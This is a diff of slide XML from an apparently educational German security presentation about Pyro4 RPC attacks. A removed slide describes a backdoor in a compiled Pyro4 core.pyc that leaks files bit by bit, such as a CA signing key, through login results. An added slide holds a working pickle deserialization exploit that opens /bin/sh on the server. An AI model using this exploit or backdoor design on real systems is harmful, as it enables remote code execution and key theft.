+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Titel 1"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:endParaRPr lang="de-DE"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="5" name="Textfeld 4"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="6021889" y="3235159"/>
+            <a:ext cx="1691689" cy="1569660"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="none" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" sz="9600" dirty="0" smtClean="0"/>
+              <a:t>NA</a:t>
+            </a:r>
+            <a:endParaRPr lang="de-DE" sz="9600" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1857826694"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide18.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Titel 1"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:endParaRPr lang="de-DE"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="5" name="Textfeld 4"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="6850732" y="4692316"/>
+            <a:ext cx="1691689" cy="1569660"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="none" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" sz="9600" dirty="0" smtClean="0"/>
+              <a:t>NA</a:t>
+            </a:r>
+            <a:endParaRPr lang="de-DE" sz="9600" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1857826694"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide19.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="4" name="Inhaltsplatzhalter 3" descr="batman.jpg"/>
+          <p:cNvPicPr>
+            <a:picLocks noGrp="1" noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId2">
+            <a:extLst>
+              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+              </a:ext>
+            </a:extLst>
+          </a:blip>
+          <a:srcRect t="1115" b="1115"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr/>
+      </p:pic>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="7" name="Titel 1"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="274638"/>
+            <a:ext cx="8229600" cy="1143000"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>BATMAN!!!</a:t>
+            </a:r>
+            <a:endParaRPr lang="de-DE" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3538495878"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -3538,6 +4422,61 @@
 </p:sld>
 </file>
 
+<file path=ppt/slides/slide20.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="5" name="Inhaltsplatzhalter 4" descr="difference.jpg"/>
+          <p:cNvPicPr>
+            <a:picLocks noGrp="1" noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId2">
+            <a:extLst>
+              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+              </a:ext>
+            </a:extLst>
+          </a:blip>
+          <a:srcRect t="1115" b="1115"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr/>
+      </p:pic>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="109070227"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
 <file path=ppt/slides/slide3.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
@@ -3607,7 +4546,7 @@
           <a:p>
             <a:r>
               <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
-              <a:t>Least privilage</a:t>
+              <a:t>Least privilege</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -5102,29 +6041,6 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="2" name="Titel 1"/>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
-              <a:t>Backdoor 2</a:t>
-            </a:r>
-            <a:endParaRPr lang="de-DE" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
           <p:cNvPr id="3" name="Inhaltsplatzhalter 2"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
@@ -5135,188 +6051,101 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="457200" y="1600200"/>
-            <a:ext cx="8229600" cy="5043905"/>
+            <a:off x="457200" y="274638"/>
+            <a:ext cx="8229600" cy="5851525"/>
           </a:xfrm>
         </p:spPr>
         <p:txBody>
           <a:bodyPr>
-            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
+            <a:normAutofit/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
-              <a:t>Compile </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0"/>
-              <a:t>a vulnerable core.py file of the Pyro4 RPC middleware </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
-              <a:t>into core.pyc </a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
-              <a:t>RPC checks </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0"/>
-              <a:t>if </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
-              <a:t>called </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0"/>
-              <a:t>method </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
-              <a:t>= credential_login </a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0"/>
-              <a:t>C</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
-              <a:t>hecks </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0"/>
-              <a:t>if </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
-              <a:t>provided </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0"/>
-              <a:t>username </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
-              <a:t>has </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0"/>
-              <a:t>certain </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
-              <a:t>prefix</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0"/>
-              <a:t>E</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
-              <a:t>xtracts </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0"/>
-              <a:t>a filename from </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
-              <a:t>provided username</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0"/>
-              <a:t>U</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
-              <a:t>ses password </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0"/>
-              <a:t>as offset n </a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0"/>
-              <a:t>T</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
-              <a:t>ries </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0"/>
-              <a:t>to read the nth bit of the provided </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
-              <a:t>file</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
-              <a:t>If </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0"/>
-              <a:t>the bit is 0 </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
-              <a:t>returns </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0"/>
-              <a:t>a login </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
-              <a:t>error, successful login </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
-              <a:t>otherwise</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
-              <a:t> </a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
-              <a:t>Read </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0"/>
-              <a:t>any file that the core RPC application can </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
-              <a:t>read</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
-              <a:t>(CA signing key)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>class RunBinSh(object):</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>    def __reduce__(self):</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>        return (subprocess.Popen, (('/bin/sh', ),))</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="de-DE" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>def main():</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>    Pyro4.config.SERIALIZER = "</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>pickle</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>"</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>    rpc = Pyro4.Proxy("PYRO:status@%s:%d" % (host, port))</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>    print rpc.test(RunBinSh())</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>-&gt; PWND</a:t>
+            </a:r>
             <a:endParaRPr lang="de-DE" dirty="0"/>
           </a:p>
         </p:txBody>
@@ -5324,7 +6153,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1254974569"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3454250863"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
